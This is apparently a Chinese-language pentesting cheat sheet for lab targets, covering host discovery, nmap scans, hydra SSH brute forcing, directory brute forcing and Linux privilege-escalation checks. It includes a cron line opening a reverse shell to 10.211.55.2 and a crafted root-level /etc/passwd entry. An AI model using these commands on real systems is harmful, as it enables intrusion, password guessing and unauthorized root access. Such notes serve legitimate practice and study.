常用命令
· 阅读需 3 分钟
Right?
主机发现
arp-scan
arp-scan -l
netdiscover
指定网段扫描
netdiscover -r 192.168.56.0/24
指定网卡扫描
netdiscover -i eth0 -r 192.168.56.0/24
枚举
nmap scan
扫描全端口
nmap -sT --min-rate=10000 -p- 192.168.56.1 -oN nmap_result/port
sudo nmap -sU --min-rate 10000 -p- 192.168.56.1 -oN nmap_result/udp
剪切开放端口
nmap -p- --min-rate=10000 -T4 192.168.56.1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//
cat nmap_result/port | grep 'open' | awk -F'/' '{print $1}'| tr "\n" ','
详细扫描
sudo nmap -sT -sV -sC -O -p port -oN nmap_result/details 192.168.56.1
漏洞�扫描
nmap --script=vuln 192.168.56.1 -p port -oN nmap_result/vuln
web
nikto -h http://192.168.56.1
TCP的全端口扫描
nmap -sT --min-rate 10000 -p- 192.168.56.122
详细扫描端口
nmap -sT -sV -sC -O -p21,22,80 192.168.56.122
FTP匿名登录
ftp 192.168.56.122
anonymous
SSH登录
爆破
hydra -l renu -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt ssh://192.168.56.120
ssh w1r3s@192.168.56.127 -i id_rsa
POP3登录
登录
USER your_username
PASS your_password
查看邮件数量
STAT
获取邮件列表
LIST
查看特定邮件(例如,查看第一封邮件)
RETR 1
删除特定邮件(例如,删除第一封邮件)
DELE 1
$ telnet pop.example.com 110
+OK POP3 server ready
USER your_username
+OK User name accepted
PASS your_password
+OK Password accepted
STAT
+OK 3 2048
LIST
+OK 3 messages:
1 1024
2 1024
3 512
RETR 1
+OK 1024 octets
[邮件内容]
.
QUIT
+OK Goodbye
目录扫描
gobuster
gobuster dir -u http://192.168.56.122/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html
dirsearch
dirsearch -u http://192.168.56.101 -w zidian.txt -e php
dirb
dirb http://192.168.56.100 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dirb http://192.168.56.1 -X .txt,.html,.tar,.zip,.php
feroxbuster
feroxbuster --scan-limit 2 -t 1 --filter-status 404 -u http://192.168.56.108
字典
kali linux中自带的一些字典
/usr/share/wordlists/dirbuster/directory-list-2.3-*.txt
/usr/share/wordlists/dirbuster/directory-list-1.0.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/small.txt
/usr/share/wordlists/dirb/extensions_common.txt
还有secLists的字典
apt install secLists
/usr/share/seclists/
提权
寻找特殊程序能力
getcap -r / 2>/dev/null
find查找suid权限的文件
find / -type f -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
sudo
*/1 * * * * /bin/sh -i >& /dev/tcp/10.211.55.2/9999 0>&1
定时任务
cat /etc/crontab
ls /var/spool/cron/crontabs/
内核
uname -a
lsb_release -a
可写文件
find / -writable 2>/dev/null
生成passwd密码
openssl passwd -1 -salt somesalt 123456 > hash.txt
corr:$1$somesalt$uGkN1R3BfqJr15hKXW5jt.:0:0::/root:/bin/bash